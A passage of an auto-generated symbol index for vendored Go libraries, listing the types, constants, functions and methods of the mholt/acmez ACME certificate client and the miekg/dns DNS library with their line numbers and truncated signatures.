148) | ProblemTypeNamespace = "urn:ietf:params:acme:error:" constant ProblemTypeAccountDoesNotExist (line 150) | ProblemTypeAccountDoesNotExist = ProblemTypeNamespace + "accountDoes... constant ProblemTypeAlreadyRevoked (line 151) | ProblemTypeAlreadyRevoked = ProblemTypeNamespace + "alreadyRevo... constant ProblemTypeBadCSR (line 152) | ProblemTypeBadCSR = ProblemTypeNamespace + "badCSR" constant ProblemTypeBadNonce (line 153) | ProblemTypeBadNonce = ProblemTypeNamespace + "badNonce" constant ProblemTypeBadPublicKey (line 154) | ProblemTypeBadPublicKey = ProblemTypeNamespace + "badPublicKey" constant ProblemTypeBadRevocationReason (line 155) | ProblemTypeBadRevocationReason = ProblemTypeNamespace + "badRevocati... constant ProblemTypeBadSignatureAlgorithm (line 156) | ProblemTypeBadSignatureAlgorithm = ProblemTypeNamespace + "badSignatur... constant ProblemTypeCAA (line 157) | ProblemTypeCAA = ProblemTypeNamespace + "caa" constant ProblemTypeCompound (line 158) | ProblemTypeCompound = ProblemTypeNamespace + "compound" constant ProblemTypeConnection (line 159) | ProblemTypeConnection = ProblemTypeNamespace + "connection" constant ProblemTypeDNS (line 160) | ProblemTypeDNS = ProblemTypeNamespace + "dns" constant ProblemTypeExternalAccountRequired (line 161) | ProblemTypeExternalAccountRequired = ProblemTypeNamespace + "externalAcc... constant ProblemTypeIncorrectResponse (line 162) | ProblemTypeIncorrectResponse = ProblemTypeNamespace + "incorrectRe... constant ProblemTypeInvalidContact (line 163) | ProblemTypeInvalidContact = ProblemTypeNamespace + "invalidCont... constant ProblemTypeMalformed (line 164) | ProblemTypeMalformed = ProblemTypeNamespace + "malformed" constant ProblemTypeOrderNotReady (line 165) | ProblemTypeOrderNotReady = ProblemTypeNamespace + "orderNotReady" constant ProblemTypeRateLimited (line 166) | ProblemTypeRateLimited = ProblemTypeNamespace + "rateLimited" constant ProblemTypeRejectedIdentifier (line 167) | ProblemTypeRejectedIdentifier = ProblemTypeNamespace + "rejectedIde... constant ProblemTypeServerInternal (line 168) | ProblemTypeServerInternal = ProblemTypeNamespace + "serverInter... constant ProblemTypeTLS (line 169) | ProblemTypeTLS = ProblemTypeNamespace + "tls" constant ProblemTypeUnauthorized (line 170) | ProblemTypeUnauthorized = ProblemTypeNamespace + "unauthorized" constant ProblemTypeUnsupportedContact (line 171) | ProblemTypeUnsupportedContact = ProblemTypeNamespace + "unsupported... constant ProblemTypeUnsupportedIdentifier (line 172) | ProblemTypeUnsupportedIdentifier = ProblemTypeNamespace + "unsupported... constant ProblemTypeUserActionRequired (line 173) | ProblemTypeUserActionRequired = ProblemTypeNamespace + "userActionR... FILE: vendor/github.com/mholt/acmez/client.go type Client (line 57) | type Client struct method ObtainCertificateUsingCSRSource (line 87) | func (c *Client) ObtainCertificateUsingCSRSource(ctx context.Context, ... method ObtainCertificateUsingCSR (line 253) | func (c *Client) ObtainCertificateUsingCSR(ctx context.Context, accoun... method ObtainCertificate (line 277) | func (c *Client) ObtainCertificate(ctx context.Context, account acme.A... method getAuthzObjects (line 322) | func (c *Client) getAuthzObjects(ctx context.Context, account acme.Acc... method solveChallenges (line 373) | func (c *Client) solveChallenges(ctx context.Context, account acme.Acc... method presentForNextChallenge (line 459) | func (c *Client) presentForNextChallenge(ctx context.Context, authz *a... method initiateCurrentChallenge (line 490) | func (c *Client) initiateCurrentChallenge(ctx context.Context, authz *... method nextChallenge (line 560) | func (c *Client) nextChallenge(authz *authzState) error { method pollAuthorization (line 587) | func (c *Client) pollAuthorization(ctx context.Context, account acme.A... method countAvailableChallenges (line 661) | func (c *Client) countAvailableChallenges(authz *authzState) int { method enabledChallengeTypes (line 671) | func (c *Client) enabledChallengeTypes() []string { type CSRSource (line 68) | type CSRSource interface function validateOrderIdentifiers (line 204) | func validateOrderIdentifiers(order *acme.Order, csr *x509.CertificateRe... type csrSource (line 232) | type csrSource struct method CSR (line 236) | func (i *csrSource) CSR(_ context.Context) (*x509.CertificateRequest, ... type authzState (line 681) | type authzState struct method listOfferedChallenges (line 689) | func (authz authzState) listOfferedChallenges() []string { method listRemainingChallenges (line 693) | func (authz authzState) listRemainingChallenges() []string { function challengeTypeNames (line 697) | func challengeTypeNames(challengeList []acme.Challenge) []string { type challengeHistory (line 708) | type challengeHistory struct method successRatio (line 713) | func (ch challengeHistory) successRatio() float64 { type failedChallengeMap (line 721) | type failedChallengeMap method rememberFailedChallenge (line 723) | func (fcm failedChallengeMap) rememberFailedChallenge(authz *authzStat... method enqueueUnfailedChallenges (line 730) | func (fcm failedChallengeMap) enqueueUnfailedChallenges(authz *authzSt... method idKey (line 739) | func (fcm failedChallengeMap) idKey(authz *authzState) string { type challengeTypes (line 746) | type challengeTypes method Len (line 749) | func (ct challengeTypes) Len() int { return len(ct) } method Swap (line 752) | func (ct challengeTypes) Swap(i, j int) { ct[i], ct[j] = ct[j], ct[i] } method Less (line 756) | func (ct challengeTypes) Less(i, j int) bool { method addUnique (line 760) | func (ct *challengeTypes) addUnique(challengeType string) { method increment (line 769) | func (ct challengeTypes) increment(challengeType string, successful bo... function contains (line 782) | func contains(haystack []string, needle string) bool { type retryableErr (line 793) | type retryableErr struct method Unwrap (line 795) | func (re retryableErr) Unwrap() error { return re.error } FILE: vendor/github.com/mholt/acmez/csr.go type otherName (line 38) | type otherName struct type permanentIdentifier (line 55) | type permanentIdentifier struct type hardwareModuleName (line 71) | type hardwareModuleName struct function forEachSAN (line 76) | func forEachSAN(der cryptobyte.String, callback func(tag int, data []byt... function createIdentifiersUsingCSR (line 96) | func createIdentifiersUsingCSR(csr *x509.CertificateRequest) ([]acme.Ide... FILE: vendor/github.com/mholt/acmez/solver.go type Solver (line 25) | type Solver interface type Waiter (line 70) | type Waiter interface type Payloader (line 83) | type Payloader interface FILE: vendor/github.com/mholt/acmez/tlsalpn01.go function TLSALPN01ChallengeCert (line 35) | func TLSALPN01ChallengeCert(challenge acme.Challenge) (*tls.Certificate,... constant ACMETLS1Protocol (line 94) | ACMETLS1Protocol = "acme-tls/1" FILE: vendor/github.com/miekg/dns/acceptfunc.go type MsgAcceptFunc (line 5) | type MsgAcceptFunc type MsgAcceptAction (line 23) | type MsgAcceptAction constant MsgAccept (line 27) | MsgAccept MsgAcceptAction = iota constant MsgReject (line 28) | MsgReject constant MsgIgnore (line 29) | MsgIgnore constant MsgRejectNotImplemented (line 30) | MsgRejectNotImplemented function defaultMsgAcceptFunc (line 33) | func defaultMsgAcceptFunc(dh Header) MsgAcceptAction { FILE: vendor/github.com/miekg/dns/client.go constant dnsTimeout (line 16) | dnsTimeout time.Duration = 2 * time.Second constant tcpIdleTimeout (line 17) | tcpIdleTimeout time.Duration = 8 * time.Second function isPacketConn (line 20) | func isPacketConn(c net.Conn) bool { type Conn (line 33) | type Conn struct method tsigProvider (line 41) | func (co *Conn) tsigProvider() TsigProvider { method ReadMsg (line 248) | func (co *Conn) ReadMsg() (*Msg, error) { method ReadMsgHeader (line 271) | func (co *Conn) ReadMsgHeader(hdr *Header) ([]byte, error) { method Read (line 313) | func (co *Conn) Read(p []byte) (n int, err error) { method WriteMsg (line 337) | func (co *Conn) WriteMsg(m *Msg) (err error) { method Write (line 353) | func (co *Conn) Write(p []byte) (int, error) { type Client (line 50) | type Client struct method dialTimeout (line 84) | func (c *Client) dialTimeout() time.Duration { method readTimeout (line 94) | func (c *Client) readTimeout() time.Duration { method writeTimeout (line 101) | func (c *Client) writeTimeout() time.Duration { method Dial (line 109) | func (c *Client) Dial(address string) (conn *Conn, err error) { method DialContext (line 114) | func (c *Client) DialContext(ctx context.Context, address string) (con... method Exchange (line 163) | func (c *Client) Exchange(m *Msg, address string) (r *Msg, rtt time.Du... method ExchangeWithConn (line 186) | func (c *Client) ExchangeWithConn(m *Msg, conn *Conn) (r *Msg, rtt tim... method ExchangeWithConnContext (line 192) | func (c *Client) ExchangeWithConnContext(ctx context.Context, m *Msg, ... method getTimeoutForRequest (line 369) | func (c *Client) getTimeoutForRequest(timeout time.Duration) time.Dura... method ExchangeContext (line 455) | func (c *Client) ExchangeContext(ctx context.Context, m *Msg, a string... function Exchange (line 78) | func Exchange(m *Msg, a string) (r *Msg, err error) { function Dial (line 387) | func Dial(network, address string) (conn *Conn, err error) { function ExchangeContext (line 398) | func ExchangeContext(ctx context.Context, m *Msg, a string) (r *Msg, err... function ExchangeConn (line 414) | func ExchangeConn(c net.Conn, m *Msg) (r *Msg, err error) { function DialTimeout (line 429) | func DialTimeout(network, address string, timeout time.Duration) (conn *... function DialWithTLS (line 435) | func DialWithTLS(network, address string, tlsConfig *tls.Config) (conn *... function DialTimeoutWithTLS (line 444) | func DialTimeoutWithTLS(network, address string, tlsConfig *tls.Config, ... FILE: vendor/github.com/miekg/dns/clientconfig.go type ClientConfig (line 12) | type ClientConfig struct method NameList (line 108) | func (c *ClientConfig) NameList(name string) []string { function ClientConfigFromFile (line 23) | func ClientConfigFromFile(resolvconf string) (*ClientConfig, error) { function ClientConfigFromReader (line 33) | func ClientConfigFromReader(resolvconf io.Reader) (*ClientConfig, error) { FILE: vendor/github.com/miekg/dns/dane.go function CertificateToDANE (line 12) | func CertificateToDANE(selector, matchingType uint8, cert *x509.Certific... FILE: vendor/github.com/miekg/dns/defaults.go constant hexDigit (line 10) | hexDigit = "0123456789abcdef" method SetReply (line 15) | func (dns *Msg) SetReply(request *Msg) *Msg { method SetQuestion (line 33) | func (dns *Msg) SetQuestion(z string, t uint16) *Msg { method SetNotify (line 44) | func (dns *Msg) SetNotify(z string) *Msg { method SetRcode (line 54) | func (dns *Msg) SetRcode(request *Msg, rcode int) *Msg { method SetRcodeFormatError (line 61) | func (dns *Msg) SetRcodeFormatError(request *Msg) *Msg { method SetUpdate (line 72) | func (dns *Msg) SetUpdate(z string) *Msg { method SetIxfr (line 83) | func (dns *Msg) SetIxfr(z string, serial uint32, ns, mbox string) *Msg { method SetAxfr (line 98) | func (dns *Msg) SetAxfr(z string) *Msg { method SetTsig (line 108) | func (dns *Msg) SetTsig(z, algo string, fudge uint16, timesigned int64) ... method SetEdns0 (line 121) | func (dns *Msg) SetEdns0(udpsize uint16, do bool) *Msg { method IsTsig (line 135) | func (dns *Msg) IsTsig() *TSIG { method IsEdns0 (line 147) | func (dns *Msg) IsEdns0() *OPT { method popEdns0 (line 160) | func (dns *Msg) popEdns0() *OPT { function IsDomainName (line 182) | func IsDomainName(s string) (labels int, ok bool) { function IsSubDomain (line 255) | func IsSubDomain(parent, child string) bool { function IsMsg (line 262) | func IsMsg(buf []byte) error { function IsFqdn (line 273) | func IsFqdn(s string) bool { function IsRRset (line 296) | func IsRRset(rrset []RR) bool { function Fqdn (line 316) | func Fqdn(s string) string { function CanonicalName (line 326) | func CanonicalName(s string) string { function ReverseAddr (line 340) | func ReverseAddr(addr string) (arpa string, err error) { method String (line 369) | func (t Type) String() string { method String (line 377) | func (c Class) String() string { method String (line 388) | func (n Name) String() string { FILE: vendor/github.com/miekg/dns/dns.go constant year68 (line 9) | year68 = 1 << 31 constant defaultTtl (line 10) | defaultTtl = 3600 constant DefaultMsgSize (line 13) | DefaultMsgSize = 4096 constant MinMsgSize (line 15) | MinMsgSize = 512 constant MaxMsgSize (line 17) | MaxMsgSize = 65535 type Error (line 21) | type Error struct method Error (line 23) | func (e *Error) Error() string { type RR (line 31) | type RR interface type RR_Header (line 67) | type RR_Header struct method Header (line 76) | func (h *RR_Header) Header() *RR_Header { return h } method copy (line 79) | func (h *RR_Header) copy() RR { return nil } method String (line 81) | func (h *RR_Header) String() string { method len (line 96) | func (h *RR_Header) len(off int, compression map[string]struct{}) int { method pack (line 102) | func (h *RR_Header) pack(msg []byte, off int, compression compressionM... method unpack (line 107) | func (h *RR_Header) unpack(msg []byte, off int) (int, error) { method parse (line 111) | func (h *RR_Header) parse(c *zlexer, origin string) *ParseError { method ToRFC3597 (line 116) | func (rr *RFC3597) ToRFC3597(r RR) error { method fromRFC3597 (line 136) | func (rr *RFC3597) fromRFC3597(r RR) error { FILE: vendor/github.com/miekg/dns/dnssec.go constant _ (line 25) | _ uint8 = iota constant RSAMD5 (line 26) | RSAMD5 constant DH (line 27) | DH constant DSA (line 28) | DSA constant _ (line 29) | _ constant RSASHA1 (line 30) | RSASHA1 constant DSANSEC3SHA1 (line 31) | DSANSEC3SHA1 constant RSASHA1NSEC3SHA1 (line 32) | RSASHA1NSEC3SHA1 constant RSASHA256 (line 33) | RSASHA256 constant _ (line 34) | _ constant RSASHA512 (line 35) | RSASHA512 constant _ (line 36) | _ constant ECCGOST (line 37) | ECCGOST constant ECDSAP256SHA256 (line 38) | ECDSAP256SHA256 constant ECDSAP384SHA384 (line 39) | ECDSAP384SHA384 constant ED25519 (line 40) | ED25519 constant ED448 (line 41) | ED448 constant INDIRECT (line 42) | INDIRECT uint8 = 252 constant PRIVATEDNS (line 43) | PRIVATEDNS uint8 = 253 constant PRIVATEOID (line 44) | PRIVATEOID uint8 = 254 constant _ (line 85) | _ uint8 = iota constant SHA1 (line 86) | SHA1 constant SHA256 (line 87) | SHA256 constant GOST94 (line 88) | GOST94 constant SHA384 (line 89) | SHA384 constant SHA512 (line 90) | SHA512 constant SEP (line 104) | SEP = 1 constant REVOKE (line 105) | REVOKE = 1 << 7 constant ZONE (line 106) | ZONE = 1 << 8 type rrsigWireFmt (line 110) | type rrsigWireFmt struct type dnskeyWireFmt (line 123) | type dnskeyWireFmt struct method KeyTag (line 132) | func (k *DNSKEY) KeyTag() uint16 { method ToDS (line 173) | func (k *DNSKEY) ToDS(h uint8) *DS { method ToCDNSKEY (line 231) | func (k *DNSKEY) ToCDNSKEY() *CDNSKEY { method ToCDS (line 239) | func (d *DS) ToCDS() *CDS { method Sign (line 252) | func (rr *RRSIG) Sign(k crypto.Signer, rrset []RR) error { function sign (line 321) | func sign(k crypto.Signer, hashed []byte, hash crypto.Hash, alg uint8) (... method Verify (line 359) | func (rr *RRSIG) Verify(k *DNSKEY, rrset []RR) error { method ValidityPeriod (line 476) | func (rr *RRSIG) ValidityPeriod(t time.Time) bool { method sigBuf (line 491) | func (rr *RRSIG) sigBuf() []byte { method publicKeyRSA (line 500) | func (k *DNSKEY) publicKeyRSA() *rsa.PublicKey { method publicKeyECDSA (line 553) | func (k *DNSKEY) publicKeyECDSA() *ecdsa.PublicKey { method publicKeyED25519 (line 578) | func (k *DNSKEY) publicKeyED25519() ed25519.PublicKey { type wireSlice (line 589) | type wireSlice method Len (line 591) | func (p wireSlice) Len() int { return len(p) } method Swap (line 592) | func (p wireSlice) Swap(i, j int) { p[i], p[j] = p[j], p[i] } method Less (line 593) | func (p wireSlice) Less(i, j int) bool { function rawSignatureData (line 600) | func rawSignatureData(rrset []RR, s *RRSIG) (buf []byte, err error) { function packSigWire (line 689) | func packSigWire(sw *rrsigWireFmt, msg []byte) (int, error) { function packKeyWire (line 726) | func packKeyWire(dw *dnskeyWireFmt, msg []byte) (int, error) { FILE: vendor/github.com/miekg/dns/dnssec_keygen.go method Generate (line 19) | func (k *DNSKEY) Generate(bits int) (crypto.PrivateKey, error) { method setPublicKeyRSA (line 80) | func (k *DNSKEY) setPublicKeyRSA(_E int, _N *big.Int) bool { method setPublicKeyECDSA (line 91) | func (k *DNSKEY) setPublicKeyECDSA(_X, _Y *big.Int) bool { method setPublicKeyED25519 (line 107) | func (k *DNSKEY) setPublicKeyED25519(_K ed25519.PublicKey) bool { function exponentToBuf (line 117) | func exponentToBuf(_E int) []byte { function curveToBuf (line 135) | func curveToBuf(_X, _Y *big.Int, intlen int) []byte { FILE: vendor/github.com/miekg/dns/dnssec_keyscan.go method NewPrivateKey (line 17) | func (k *DNSKEY) NewPrivateKey(s string) (crypto.PrivateKey, error) { method ReadPrivateKey (line 28) | func (k *DNSKEY) ReadPrivateKey(q io.Reader, file string) (crypto.Privat... function readPrivateKeyRSA (line 76) | func readPrivateKeyRSA(m map[string]string) (*rsa.PrivateKey, error) { function readPrivateKeyECDSA (line 108) | func readPrivateKeyECDSA(m map[string]string) (*ecdsa.PrivateKey, error) { function readPrivateKeyED25519 (line 127) | func readPrivateKeyED25519(m map[string]string) (ed25519.PrivateKey, err... function parseKey (line 150) | func parseKey(r io.Reader, file string) (map[string]string, error) { type klexer (line 179) | type klexer struct method Err (line 207) | func (kl *klexer) Err() error { method readByte (line 216) | func (kl *klexer) readByte() (byte, bool) { method Next (line 244) | func (kl *klexer) Next() (lex, bool) { function newKLexer (line 192) | func newKLexer(r io.Reader) *klexer { FILE: vendor/github.com/miekg/dns/dnssec_privkey.go constant format (line 12) | format = "Private-key-format: v1.3\n" method PrivateKeyString (line 20) | func (r *DNSKEY) PrivateKeyString(p crypto.PrivateKey) string { FILE: vendor/github.com/miekg/dns/duplicate.go function IsDuplicate (line 8) | func IsDuplicate(r1, r2 RR) bool { method isDuplicate (line 18) | func (r1 *RR_Header) isDuplicate(_r2 RR) bool { function isDuplicateName (line 37) | func isDuplicateName(s1, s2 string) bool { return equal(s1, s2) } FILE: vendor/github.com/miekg/dns/edns.go constant EDNS0LLQ (line 14) | EDNS0LLQ = 0x1 constant EDNS0UL (line 15) | EDNS0UL = 0x2 constant EDNS0NSID (line 16) | EDNS0NSID = 0x3 constant EDNS0ESU (line 17) | EDNS0ESU = 0x4 constant EDNS0DAU (line 18) | EDNS0DAU = 0x5 constant EDNS0DHU (line 19) | EDNS0DHU = 0x6 constant EDNS0N3U (line 20) | EDNS0N3U = 0x7 constant EDNS0SUBNET (line 21) | EDNS0SUBNET = 0x8 constant EDNS0EXPIRE (line 22) | EDNS0EXPIRE = 0x9 constant EDNS0COOKIE (line 23) | EDNS0COOKIE = 0xa constant EDNS0TCPKEEPALIVE (line 24) | EDNS0TCPKEEPALIVE = 0xb constant EDNS0PADDING (line 25) | EDNS0PADDING = 0xc constant EDNS0EDE (line 26) | EDNS0EDE = 0xf constant EDNS0LOCALSTART (line 27) | EDNS0LOCALSTART = 0xFDE9 constant EDNS0LOCALEND (line 28) | EDNS0LOCALEND = 0xFFFE constant _DO (line 29) | _DO = 1 << 15 function makeDataOpt (line 33) | func makeDataOpt(code uint16) EDNS0 { type OPT (line 71) | type OPT struct method String (line 76) | func (rr *OPT) String() string { method len (line 131) | func (rr *OPT) len(off int, compression map[string]struct{}) int { method parse (line 141) | func (*OPT) parse(c *zlexer, origin string) *ParseError { method isDuplicate (line 145) | func (rr *OPT) isDuplicate(r2 RR) bool { return false } method Version (line 150) | func (rr *OPT) Version() uint8 { method SetVersion (line 155) | func (rr *OPT) SetVersion(v uint8) { method ExtendedRcode (line 160) | func (rr *OPT) ExtendedRcode() int { method SetExtendedRcode (line 167) | func (rr *OPT) SetExtendedRcode(v uint16) { method UDPSize (line 172) | func (rr *OPT) UDPSize() uint16 { method SetUDPSize (line 177) | func (rr *OPT) SetUDPSize(size uint16) { method Do (line 182) | func (rr *OPT) Do() bool { method SetDo (line 189) | func (rr *OPT) SetDo(do ...bool) { method Z (line 202) | func (rr *OPT) Z() uint16 { method SetZ (line 207) | func (rr *OPT) SetZ(z uint16) { type EDNS0 (line 212) | type EDNS0 interface type EDNS0_NSID (line 238) | type EDNS0_NSID struct method pack (line 243) | func (e *EDNS0_NSID) pack() ([]byte, error) { method Option (line 252) | func (e *EDNS0_NSID) Option() uint16 { return EDNS0NSID } method unpack (line 253) | func (e *EDNS0_NSID) unpack(b []byte) error { e.Nsid = hex.EncodeToStr... method String (line 254) | func (e *EDNS0_NSID) String() string { return e.Nsid } method copy (line 255) | func (e *EDNS0_NSID) copy() EDNS0 { return &EDNS0_NSID{e.Cod... type EDNS0_SUBNET (line 277) | type EDNS0_SUBNET struct method Option (line 286) | func (e *EDNS0_SUBNET) Option() uint16 { return EDNS0SUBNET } method pack (line 288) | func (e *EDNS0_SUBNET) pack() ([]byte, error) { method unpack (line 326) | func (e *EDNS0_SUBNET) unpack(b []byte) error { method String (line 361) | func (e *EDNS0_SUBNET) String() (s string) { method copy (line 373) | func (e *EDNS0_SUBNET) copy() EDNS0 { type EDNS0_COOKIE (line 401) | type EDNS0_COOKIE struct method pack (line 406) | func (e *EDNS0_COOKIE) pack() ([]byte, error) { method Option (line 415) | func (e *EDNS0_COOKIE) Option() uint16 { return EDNS0COOKIE } method unpack (line 416) | func (e *EDNS0_COOKIE) unpack(b []byte) error { e.Cookie = hex.EncodeT... method String (line 417) | func (e *EDNS0_COOKIE) String() string { return e.Cookie } method copy (line 418) | func (e *EDNS0_COOKIE) copy() EDNS0 { return &EDNS0_COOKIE{e... type EDNS0_UL (line 432) | type EDNS0_UL struct method Option (line 439) | func (e *EDNS0_UL) Option() uint16 { return EDNS0UL } method String (line 440) | func (e *EDNS0_UL) String() string { return fmt.Sprintf("%d %d", e.Lea... method copy (line 441) | func (e *EDNS0_UL) copy() EDNS0 { return &EDNS0_UL{e.Code, e.Lease,... method pack (line 444) | func (e *EDNS0_UL) pack() ([]byte, error) { method unpack (line 456) | func (e *EDNS0_UL) unpack(b []byte) error { type EDNS0_LLQ (line 471) | type EDNS0_LLQ struct method Option (line 481) | func (e *EDNS0_LLQ) Option() uint16 { return EDNS0LLQ } method pack (line 483) | func (e *EDNS0_LLQ) pack() ([]byte, error) { method unpack (line 493) | func (e *EDNS0_LLQ) unpack(b []byte) error { method String (line 505) | func (e *EDNS0_LLQ) String() string { method copy (line 512) | func (e *EDNS0_LLQ) copy() EDNS0 { type EDNS0_DAU (line 517) | type EDNS0_DAU struct method Option (line 523) | func (e *EDNS0_DAU) Option() uint16 { return EDNS0DAU } method pack (line 524) | func (e *EDNS0_DAU) pack() ([]byte, error) { return cloneSlice(e.AlgCo... method unpack (line 525) | func (e *EDNS0_DAU) unpack(b []byte) error { e.AlgCode = cloneSlice(b)... method String (line 527) | func (e *EDNS0_DAU) String() string { method copy (line 538) | func (e *EDNS0_DAU) copy() EDNS0 { return &EDNS0_DAU{e.Code, e.AlgCode} } type EDNS0_DHU (line 541) | type EDNS0_DHU struct method Option (line 547) | func (e *EDNS0_DHU) Option() uint16 { return EDNS0DHU } method pack (line 548) | func (e *EDNS0_DHU) pack() ([]byte, error) { return cloneSlice(e.AlgCo... method unpack (line 549) | func (e *EDNS0_DHU) unpack(b []byte) error { e.AlgCode = cloneSlice(b)... method String (line 551) | func (e *EDNS0_DHU) String() string { method copy (line 562) | func (e *EDNS0_DHU) copy() EDNS0 { return &EDNS0_DHU{e.Code, e.AlgCode} } type EDNS0_N3U (line 565) | type EDNS0_N3U struct method Option (line 571) | func (e *EDNS0_N3U) Option() uint16 { return EDNS0N3U } method pack (line 572) | func (e *EDNS0_N3U) pack() ([]byte, error) { return cloneSlice(e.AlgCo... method unpack (line 573) | func (e *EDNS0_N3U) unpack(b []byte) error { e.AlgCode = cloneSlice(b)... method String (line 575) | func (e *EDNS0_N3U) String() string { method copy (line 587) | func (e *EDNS0_N3U) copy() EDNS0 { return &EDNS0_N3U{e.Code, e.AlgCode} } type EDNS0_EXPIRE (line 590) | type EDNS0_EXPIRE struct method Option (line 597) | func (e *EDNS0_EXPIRE) Option() uint16 { return EDNS0EXPIRE } method copy (line 598) | func (e *EDNS0_EXPIRE) copy() EDNS0 { return &EDNS0_EXPIRE{e.Code, ... method pack (line 600) | func (e *EDNS0_EXPIRE) pack() ([]byte, error) { method unpack (line 609) | func (e *EDNS0_EXPIRE) unpack(b []byte) error { method String (line 623) | func (e *EDNS0_EXPIRE) String() (s string) { type EDNS0_LOCAL (line 643) | type EDNS0_LOCAL struct method Option (line 649) | func (e *EDNS0_LOCAL) Option() uint16 { return e.Code } method String (line 651) | func (e *EDNS0_LOCAL) String() string { method copy (line 655) | func (e *EDNS0_LOCAL) copy() EDNS0 { method pack (line 659) | func (e *EDNS0_LOCAL) pack() ([]byte, error) { method unpack (line 663) | func (e *EDNS0_LOCAL) unpack(b []byte) error { type EDNS0_TCP_KEEPALIVE (line 670) | type EDNS0_TCP_KEEPALIVE struct method Option (line 684) | func (e *EDNS0_TCP_KEEPALIVE) Option() uint16 { return EDNS0TCPKEEPALI... method pack (line 686) | func (e *EDNS0_TCP_KEEPALIVE) pack() ([]byte, error) { method unpack (line 695) | func (e *EDNS0_TCP_KEEPALIVE) unpack(b []byte) error { method String (line 706) | func (e *EDNS0_TCP_KEEPALIVE) String() string { method copy (line 716) | func (e *EDNS0_TCP_KEEPALIVE) copy() EDNS0 { return &EDNS0_TCP_KEEPALI... type EDNS0_PADDING (line 721) | type EDNS0_PADDING struct method Option (line 726) | func (e *EDNS0_PADDING) Option() uint16 { return EDNS0PADDING } method pack (line 727) | func (e *EDNS0_PADDING) pack() ([]byte, error) { return cloneSlice(e.P... method unpack (line 728) | func (e *EDNS0_PADDING) unpack(b []byte) error { e.Padding = cloneSlic... method String (line 729) | func (e *EDNS0_PADDING) String() string { return fmt.Sprintf("%... method copy (line 730) | func (e *EDNS0_PADDING) copy() EDNS0 { return &EDNS0_PADDING... constant ExtendedErrorCodeOther (line 734) | ExtendedErrorCodeOther uint16 = iota constant ExtendedErrorCodeUnsupportedDNSKEYAlgorithm (line 735) | ExtendedErrorCodeUnsupportedDNSKEYAlgorithm constant ExtendedErrorCodeUnsupportedDSDigestType (line 736) | ExtendedErrorCodeUnsupportedDSDigestType constant ExtendedErrorCodeStaleAnswer (line 737) | ExtendedErrorCodeStaleAnswer constant ExtendedErrorCodeForgedAnswer (line 738) | ExtendedErrorCodeForgedAnswer constant ExtendedErrorCodeDNSSECIndeterminate (line 739) | ExtendedErrorCodeDNSSECIndeterminate constant ExtendedErrorCodeDNSBogus (line 740) | ExtendedErrorCodeDNSBogus constant ExtendedErrorCodeSignatureExpired (line 741) | ExtendedErrorCodeSignatureExpired constant ExtendedErrorCodeSignatureNotYetValid (line 742) | ExtendedErrorCodeSignatureNotYetValid constant ExtendedErrorCodeDNSKEYMissing (line 743) | ExtendedErrorCodeDNSKEYMissing constant ExtendedErrorCodeRRSIGsMissing (line 744) | ExtendedErrorCodeRRSIGsMissing constant ExtendedErrorCodeNoZoneKeyBitSet (line 745) | ExtendedErrorCodeNoZoneKeyBitSet constant ExtendedErrorCodeNSECMissing (line 746) | ExtendedErrorCodeNSECMissing constant ExtendedErrorCodeCachedError (line 747) | ExtendedErrorCodeCachedError constant ExtendedErrorCodeNotReady (line 748) | ExtendedErrorCodeNotReady constant ExtendedErrorCodeBlocked (line 749) | ExtendedErrorCodeBlocked constant ExtendedErrorCodeCensored (line 750) | ExtendedErrorCodeCensored constant ExtendedErrorCodeFiltered (line 751) | ExtendedErrorCodeFiltered constant ExtendedErrorCodeProhibited (line 752) | ExtendedErrorCodeProhibited constant ExtendedErrorCodeStaleNXDOMAINAnswer (line 753) | ExtendedErrorCodeStaleNXDOMAINAnswer constant ExtendedErrorCodeNotAuthoritative (line 754) | ExtendedErrorCodeNotAuthoritative constant ExtendedErrorCodeNotSupported (line 755) | ExtendedErrorCodeNotSupported constant ExtendedErrorCodeNoReachableAuthority (line 756) | ExtendedErrorCodeNoReachableAuthority constant ExtendedErrorCodeNetworkError (line 757) | ExtendedErrorCodeNetworkError constant ExtendedErrorCodeInvalidData (line 758) | ExtendedErrorCodeInvalidData type EDNS0_EDE (line 797) | type EDNS0_EDE struct method Option (line 803) | func (e *EDNS0_EDE) Option() uint16 { return EDNS0EDE } method copy (line 804) | func (e *EDNS0_EDE) copy() EDNS0 { return &EDNS0_EDE{e.InfoCode, e.... method String (line 806) | func (e *EDNS0_EDE) String() string { method pack (line 814) | func (e *EDNS0_EDE) pack() ([]byte, error) { method unpack (line 821) | func (e *EDNS0_EDE) unpack(b []byte) error { type EDNS0_ESU (line 831) | type EDNS0_ESU struct method Option (line 837) | func (e *EDNS0_ESU) Option() uint16 { return EDNS0ESU } method String (line 838) | func (e *EDNS0_ESU) String() string { return e.Uri } method copy (line 839) | func (e *EDNS0_ESU) copy() EDNS0 { return &EDNS0_ESU{e.Code,... method pack (line 840) | func (e *EDNS0_ESU) pack() ([]byte, error) { return []byte(e.Uri), nil } method unpack (line 841) | func (e *EDNS0_ESU) unpack(b []byte) error { FILE: vendor/github.com/miekg/dns/format.go function NumField (line 10) | func NumField(r RR) int { function Field (line 18) | func Field(r RR, i int) string { FILE: vendor/github.com/miekg/dns/fuzz.go function Fuzz (line 8) | func Fuzz(data []byte) int { function FuzzNewRR (line 21) | func FuzzNewRR(data []byte) int { FILE: vendor/github.com/miekg/dns/generate.go method generate (line 21) | func (zp *ZoneParser) generate(l lex) (RR, bool) { type generateReader (line 93) | type generateReader struct method parseError (line 112) | func (r *generateReader) parseError(msg string, end int) *ParseError { method Read (line 122) | func (r *generateReader) Read(p []byte) (int, error) { method ReadByte (line 129) | func (r *generateReader) ReadByte() (byte, error) { function modToPrintf (line 211) | func modToPrintf(s string) (string, int64, string) { FILE: vendor/github.com/miekg/dns/hash.go type identityHash (line 10) | type identityHash struct method Write (line 16) | func (i identityHash) Write(b []byte) (int, error) { return i.b.Write(... method Size (line 17) | func (i identityHash) Size() int { return i.b.Len() } method BlockSize (line 18) | func (i identityHash) BlockSize() int { return 1024 } method Reset (line 19) | func (i identityHash) Reset() { i.b.Reset() } method Sum (line 20) | func (i identityHash) Sum(b []byte) []byte { return append(b, ... function hashFromAlgorithm (line 22) | func hashFromAlgorithm(alg uint8) (hash.Hash, crypto.Hash, error) { FILE: vendor/github.com/miekg/dns/labels.go function SplitDomainName (line 12) | func SplitDomainName(s string) (labels []string) { function CompareDomainName (line 49) | func CompareDomainName(s1, s2 string) (n int) { function CountLabel (line 88) | func CountLabel(s string) (labels int) { function Split (line 107) | func Split(s string) []int { function NextLabel (line 128) | func NextLabel(s string, offset int) (i int, end bool) { function PrevLabel (line 154) | func PrevLabel(s string, n int) (i int, start bool) { function equal (line 190) | func equal(a, b string) bool { 